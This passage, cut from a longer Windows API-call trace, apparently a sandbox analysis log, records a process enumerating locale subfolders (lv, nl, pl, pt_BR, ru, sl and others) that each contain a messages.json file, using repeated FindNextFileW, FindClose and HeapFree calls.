ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.841] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.841] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="lv", cAlternateFileName="")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.841] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.841] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="nl", cAlternateFileName="")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.842] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="no", cAlternateFileName="")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c12fb00, ftLastWriteTime.dwHighDateTime=0x1d0f3ee, nFileSizeHigh=0x0, nFileSizeLow=0x9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x9c12fb00, ftLastWriteTime.dwHighDateTime=0x1d0f3ee, nFileSizeHigh=0x0, nFileSizeLow=0x9f, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.842] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.842] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.842] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pl", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x8528a390, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x8528a390, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852893f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.843] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.843] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_BR", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8528a390, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.843] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.843] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="pt_PT", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.843] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.844] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.844] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ro", cAlternateFileName="")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.844] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.844] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ru", cAlternateFileName="")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.844] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.844] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sk", cAlternateFileName="")) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.845] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.845] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: lpFindFileData=0x353df30*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="sl", cAlternateFileName="")) returned 1 [0052.845] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x852b04f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1580, lpFindFileData=0x353dcb4 | out: lpFindFileData=0x353dcb4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x852b04f0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x852b04f0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x85639950, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xb3, dwReserved0=0x0, dwReserved1=0x0, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0052.846] FindClose (in: hFindFile=0x3ef1580 | out: hFindFile=0x3ef1580) returned 1 [0052.846] HeapFree (in: hHeap=0x570000, dwFlags=0x0, lpMem=0x4002500 | out: hHeap=0x570000) returned 1 [0052.846] FindNextFileW (in: hFindFile=0x3ef1680, lpFindFileData=0x353df30 | out: 